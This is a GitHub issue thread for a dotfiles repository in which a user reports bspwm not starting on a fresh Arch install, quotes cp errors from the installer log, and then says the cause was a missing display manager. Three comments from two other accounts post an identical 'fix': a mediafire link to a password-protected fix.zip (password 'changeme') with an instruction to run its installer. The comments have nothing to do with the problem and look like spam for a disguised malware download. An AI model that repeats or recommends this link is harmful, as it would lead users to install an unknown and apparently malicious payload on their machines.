### ISSUE TITLE
The bspwm won't open

### ISSUE THREAD

**Issue by Rysimaneq** [gh0stzk/dotfiles#306]
Hello there! I just made myself a fresh arch installation and decided to go with your dotfiles but after the end of the script and rebooting i'm back in the terminal but with your zsh config. When i type `bspwm` into the terminal it says: `The server closed the connection:can't parse display string.` I'm sure that there is nothing wrong with the basic installation i did because i used it a few times when i was doing my own hyprland dotfiles in the past. I downloaded and installed the xorg-server package and xorg group, got me some AMD drivers, even tried running the `startx`. Besides that it spit a few errors in the 'RiceError.log'. 
`cp: cannot stat ' /home/rysimaneq/dotfiles/config/*' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/applications' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/asciiart' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/fonts' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/startup-page' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/bin' :no such file or directory
cp: cannot stat ' /home/rysimaneq/dotfiles/misc/firefox' :no such file or directory
cp: target ' /home/rysimaneq/.mozilla/firefox/*.default-release' no such file or directory`
I would be more then thankfull for some help with fixing that.

**Comment by Rysimaneq** [comment]
Nevermind, i'm a dummy and forgot about display manager. Sorry for any trouble, atleast dummies like me will see this and learn from my mistake.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
